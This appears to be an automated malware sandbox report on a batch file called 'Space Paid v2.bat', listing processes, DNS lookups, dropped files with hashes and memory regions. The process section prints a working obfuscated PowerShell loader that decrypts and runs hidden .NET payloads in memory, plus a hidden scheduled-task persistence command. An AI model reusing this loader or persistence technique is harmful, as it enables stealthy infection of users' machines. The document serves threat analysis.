C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Space Paid v2.bat"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/SKWGkqWfBPts6TUnMgnDqYmX8MpEwLAo3HUHFOUjzI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ghwm5EhH8tXaBpOVD1X+Rg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $jqCXf=New-Object System.IO.MemoryStream(,$param_var); $YXcdm=New-Object System.IO.MemoryStream; $PKGkZ=New-Object System.IO.Compression.GZipStream($jqCXf, [IO.Compression.CompressionMode]::Decompress); $PKGkZ.CopyTo($YXcdm); $PKGkZ.Dispose(); $jqCXf.Dispose(); $YXcdm.Dispose(); $YXcdm.ToArray();}function execute_function($param_var,$param2_var){ $lmNqD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $AayDY=$lmNqD.EntryPoint; $AayDY.Invoke($null, $param2_var);}$CnPhd = 'C:\Users\Admin\AppData\Local\Temp\Space Paid v2.bat';$host.UI.RawUI.WindowTitle = $CnPhd;$LgROZ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($CnPhd).Split([Environment]::NewLine);foreach ($WnNUO in $LgROZ) { if ($WnNUO.StartsWith('wbcEgAsGQeSLuSguymAP')) { $gtIWp=$WnNUO.Substring(20); break; }}$payloads_var=[string[]]$gtIWp.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_262_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_262.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_262.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_262.bat" "
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/SKWGkqWfBPts6TUnMgnDqYmX8MpEwLAo3HUHFOUjzI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ghwm5EhH8tXaBpOVD1X+Rg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $jqCXf=New-Object System.IO.MemoryStream(,$param_var); $YXcdm=New-Object System.IO.MemoryStream; $PKGkZ=New-Object System.IO.Compression.GZipStream($jqCXf, [IO.Compression.CompressionMode]::Decompress); $PKGkZ.CopyTo($YXcdm); $PKGkZ.Dispose(); $jqCXf.Dispose(); $YXcdm.Dispose(); $YXcdm.ToArray();}function execute_function($param_var,$param2_var){ $lmNqD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $AayDY=$lmNqD.EntryPoint; $AayDY.Invoke($null, $param2_var);}$CnPhd = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_262.bat';$host.UI.RawUI.WindowTitle = $CnPhd;$LgROZ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($CnPhd).Split([Environment]::NewLine);foreach ($WnNUO in $LgROZ) { if ($WnNUO.StartsWith('wbcEgAsGQeSLuSguymAP')) { $gtIWp=$WnNUO.Substring(20); break; }}$payloads_var=[string[]]$gtIWp.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | freegeoip.net | udp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
Files
memory/3596-0-0x00007FFFFD683000-0x00007FFFFD685000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4eaxo42x.pnf.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3596-9-0x0000020C7D3D0000-0x0000020C7D3F2000-memory.dmp
memory/3596-10-0x00007FFFFD680000-0x00007FFFFE142000-memory.dmp
memory/3596-11-0x00007FFFFD680000-0x00007FFFFE142000-memory.dmp
memory/3596-12-0x0000020C7D830000-0x0000020C7D876000-memory.dmp
memory/3596-13-0x00007FFFFD680000-0x00007FFFFE142000-memory.dmp
memory/3596-14-0x0000020C7D470000-0x0000020C7D478000-memory.dmp
memory/3596-15-0x0000020C7D880000-0x0000020C7D8F0000-memory.dmp
memory/1172-17-0x00007FFFFD680000-0x00007FFFFE142000-memory.dmp
memory/1172-26-0x00007FFFFD680000-0x00007FFFFE142000-memory.dmp
memory/1172-27-0x00007FFFFD680000-0x00007FFFFE142000-memory.dmp
memory/1172-30-0x00007FFFFD680000-0x00007FFFFE142000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | df472dcddb36aa24247f8c8d8a517bd7 |
| SHA1 | 6f54967355e507294cbc86662a6fbeedac9d7030 |
| SHA256 | e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6 |
| SHA512 | 06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca |
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_262.vbs
| MD5 | 9b08c93e91fc8f98135f6739773d2895 |
| SHA1 | 588ac73c0e7d9e96d94d537bce9fe6ce0f431f77 |
| SHA256 | 84b18370ed253d92e23b6582a927a8f8218063b7111090d8613a9228b7bb017b |
| SHA512 | aad984a817257788ad2166cc27ccf99d7298bf363a991686807411300e6a9a114774c623acb6773ffbd06d4610500787d2f4e21bfdf3388fd32e471a1e791897 |
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_262.bat
| MD5 | a5c3bef843c9d6022db92547f32855d1 |
| SHA1 | 816338da7ee45d496f39bbd36c6b106ee0b3e2fe |
| SHA256 | ef70e618b652c777b3b2e589d1381bda6c7e49e7f2510334257c1e2add139045 |
| SHA512 | 0e44e31275a89f29388418538f57cb3437ad1d24f08d0c3c7d85a1a906c5b212024f2960237b66e3f2838923497e82f198ad8c4ed0b34548190e6db03504f1bd |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 163e14e51fd8b0531d78be5d1545e7ba |
| SHA1 | 5a7c318d27842573a197b62afd0ae28307cc63b5 |
| SHA256 | 327322c1f043991fd9532975c6a07ddcdd95670ffe853c5ecc4421dc8ba96cc3 |
| SHA512 | 0deaf77247da2d14df6eee4b4a1dbc0c0834e15d64c81cade859979be644d0e93fa90749839a64d27c8b6322572f6789e916864dfc3372e57a5c56e87acff9e7 |
memory/3320-47-0x00000000027E0000-0x000000000280A000-memory.dmp
memory/2008-98-0x00007FF7DE570000-0x00007FF7DE580000-memory.dmp
memory/1152-97-0x00007FF7DE570000-0x00007FF7DE580000-memory.dmp
memory/2556-95-0x00007FF7DE570000-0x00007FF7DE580000-memory.dmp
memory/1804-104-0x00007FF7DE570000-0x00007FF7DE580000-memory.dmp
memory/3320-99-0x00007FF7DE570000-0x00007FF7DE580000-memory.dmp
memory/720-96-0x00007FF7DE570000-0x00007FF7DE580000-memory.dmp
memory/2260-103-0x00007FF7DE570000-0x00007FF7DE580000-memory.dmp
memory/3612-102-0x00007FF7DE570000-0x00007FF7DE580000-memory.dmp
memory/4452-101-0x00007FF7DE570000-0x00007FF7DE580000-memory.dmp
memory/1312-109-0x00007FF7DE570000-0x00007FF7DE580000-memory.dmp
memory/1504-100-0x00007FF7DE570000-0x00007FF7DE580000-memory.dmp
memory/1900-108-0x00007FF7DE570000-0x00007FF7DE580000-memory.dmp
memory/932-105-0x00007FF7DE570000-0x00007FF7DE580000-memory.dmp
memory/1892-110-0x00007FF7DE570000-0x00007FF7DE580000-memory.dmp
memory/1220-107-0x00007FF7DE570000-0x00007FF7DE580000-memory.dmp
memory/2744-106-0x00007FF7DE570000-0x00007FF7DE580000-memory.dmp
memory/3596-132-0x00007FFFFD680000-0x00007FFFFE142000-memory.dmp
memory/3932-144-0x0000017C7F1E0000-0x0000017C7F23E000-memory.dmp
memory/3932-145-0x0000017C7F660000-0x0000017C7F672000-memory.dmp